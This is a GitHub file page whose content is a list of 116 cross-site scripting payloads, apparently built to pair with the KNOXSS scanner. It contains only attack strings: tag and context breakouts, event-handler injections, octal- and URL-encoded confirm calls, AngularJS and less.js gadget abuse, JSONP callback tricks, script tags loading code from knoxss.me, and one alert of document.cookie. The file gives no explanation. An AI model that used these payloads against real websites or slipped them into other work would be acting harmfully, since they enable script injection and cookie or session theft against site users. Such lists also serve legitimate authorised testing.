-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathpayload-4 (combine using KNOXSS payload)
116 lines (116 loc) · 6.16 KB
/
payload-4 (combine using KNOXSS payload)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
rootbakar<!'/*"/*\'/*\"/*--></Script><Image Srcset=K */; Onerror=alert(document.domain) //>
<svg/onload=alert(document.cookie)>
"><svg/onload-alert(document.domain)>
"><svg/onload=alert(/1/)>
</script><script>a lert(/1/)</script>
<!'/*!"/*!\'/*\"/*--!><Input/Autofocus/%0D*/Onfocus=confirm%601%60//><Svg>
"--!><Svg/Onload=confirm'1'>"
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm'1'>
'"--!><Script /K/>confirm'1'//</Script /K/><!--
'"--!><Image%0CSrcset=.%0COnerror=confirm%601%60 //
'"--!>%25%75003CSvg /%25%753008Svg /%25%75FF1CSvg /Onload=confirm'1' //
'" /Autof<K>ocus /O<K>nfocus=confirm'1' //
'"--!><Body /Onpageshow=confirm'1'>
'"--!><Svg><Set /Onbegin=confirm'1'>
"'--!><Html/Onmouseenter=confirm'1'//>"
'" /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirm'1' //
'"--!><K /Onbeforescriptexecute=confirm'1' //
'"--!><Svg><Script /Xlink:Href=https:@knoxss.me/1 />
'"--!><Object /Data=JavaS%26%2399ript:confirm'1'>
'"--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
'"--!><Base /Href=https:@knoxss.me>
<!'/*!"/*\'/*\"/**/-top['con\x66irm']'1'//><svg>
<!'/*!"/*\'/*\"/**/-[location='Javas\x63ript:confirm%25281%2529']//><svg>
<!'/*!"/*\'/*\"/**/-[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\143\157\156\146\151\162\155\50\61\51')()//><svg>
<!'/*!"/*\'/*\"/**/-confirm'1',//><svg>
<!'/*!"/*\'/*\"/**/-confirm'1'};//><svg>
"-confirm(/1/)-"
<!'/*!"/*\'/*\"/**/}confirm'1';k:{//><svg>
<!'/*!"/*\'/*\"/**/}confirm'1'?0:function k(){//><svg>
'"--!></Script%0C><Script/Src=https:knoxss.me/1>
'"--!></Script/><Svg/Onload=confirm'1'//
\"-confirm'1'//
\"-confirm'1'<!--
\"-confirm'1'%0A-->
\"-confirm'1'}//
\"-confirm'1'}<!--
\"-confirm'1'}%0A-->
\"-confirm'1',//
\"-confirm'1',<!--
\"-confirm'1',%0A-->
\"-confirm'1'};k={//
\"-confirm'1'};k={<!--
\"-confirm'1'};k={%0A-->
\"}confirm'1';k:{//
\"}confirm'1';k:{<!--
\"}confirm'1';k:{%0A-->
\"}confirm'1'?0:function k(){//
\"}confirm'1'?0:function k(){<!--
\"}confirm'1'?0:function k(){%0A-->
\'-confirm'1'//
\'-confirm'1'<!--
\'-confirm'1'%0A-->
\'-confirm'1'}//
\'-confirm'1'}<!--
\'-confirm'1'}%0A-->
\'-confirm'1',//
\'-confirm'1',<!--
\'-confirm'1',%0A-->
\'-confirm'1'};k={//
\'-confirm'1'};k={<!--
\'-confirm'1'};k={%0A-->
\'}confirm'1';k:{//
\'}confirm'1';k:{<!--
\'}confirm'1';k:{%0A-->
\'}confirm'1'?0:function k(){//
\'}confirm'1'?0:function k(){<!--
\'}confirm'1'?0:function k(){%0A-->
"-confirm'1'-"
1"?confirm'1':"
"-top["con\x66irm"]'1'-"
1"?top["con\x66irm"]'1':"
"-[location="Javas\x63ript:confirm%25281%2529"]-"
1"?location="Javas\x63ript:confirm%25281%2529":"
"-[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\143\157\156\146\151\162\155\50\61\51")()-"
"?[]["\146\151\154\164\145\162"]["\143\157\156\163\164\162\165\143\164\157\162"]("\143\157\156\146\151\162\155\50\61\51")():"
'-confirm'1'-'
1'?confirm'1':'
'-top['con\x66irm']'1'-'
1'?top['con\x66irm']'1':'
'-[location='Javas\x63ript:confirm%25281%2529']-'
1'?location='Javas\x63ript:confirm%25281%2529':'
'-[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\143\157\156\146\151\162\155\50\61\51')()-'
'?[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\143\157\156\146\151\162\155\50\61\51')():'
'"--!><Script /K/Src=https:@knoxss.me/1>confirm%601%60</Script/K>
'"--!><Script /K/>confirm'1'</Script /K/>
"--!><Svg/Onload=confirm'1'>"
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Svg /Onload=confirm'1'>
'"--!><Image%0CSrcset=.%0COnerror=confirm%601%60 //
'"--!>%25%75003CSvg /%25%753008Svg /%25%75FF1CSvg /Onload=confirm'1' //
'"--!><Input /Autofocus /Onfocus=confirm'1' //
'" /Autof<K>ocus /O<K>nfocus=confirm'1' //
'"--!><Body /Onpageshow=confirm'1'>
'"--!><Svg><Set /Onbegin=confirm'1'>
"'--!><Html/Onmouseenter=confirm'1'//>"
'" /Style=position:fixed;top:0;left:0;font-size:999px; /Onmouseenter=confirm'1' //
'"--!><K /Onbeforescriptexecute=confirm'1' //
'"--!><Svg><Script /Xlink:Href=Data:,confirm'1' />
'"--!><Object /Data=JavaS%26%2399ript:confirm'1'>
'"--!></Iframe><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
'"--!><Base /Href=https:@knoxss.me>
'"--!><K:script xmlns:K="http://www.w3.org/1999/xhtml">confirm'1'</K:script>
'"--!><K /Ng-App>{{a="".constructor.prototype;a.charAt=a.trim;$eval("a,confirm'1',b")}}
'"--!><<!--%23set%20var="x"value="svg /o"var="y"value="nload=confirm'1'"--><!--%23echo%20var="x"var="y"-->>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /K>confirm'1'</Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script Src=Data:,confirm'1'>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=Data:,confirm'1'></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api/api.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/cart.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api/cart.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/cart/add.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/search.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=/api/search.json?callback=confirm'1'//></Script/>
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Script /Src=https:ajax.googleapis.com/ajax/libs/angularjs/1.1.3/angular.min.js></Script/><B /Style=position:fixed;top:0;left:0;font-size:999px%0C/Ng-App /Ng-Csp /Ng-Mouseenter=$event.view.confirm(1)>___
'"--!></Title/</Style/</Script/</Textarea/</Noscript/</Pre/</Xmp><Style /Type=text/less>k{n:'function(){confirm(1)}()'}</Style/><Script /Src=https:cdnjs.cloudflare.com/ajax/libs/less.js/2.7.1/less.min.js></Script/>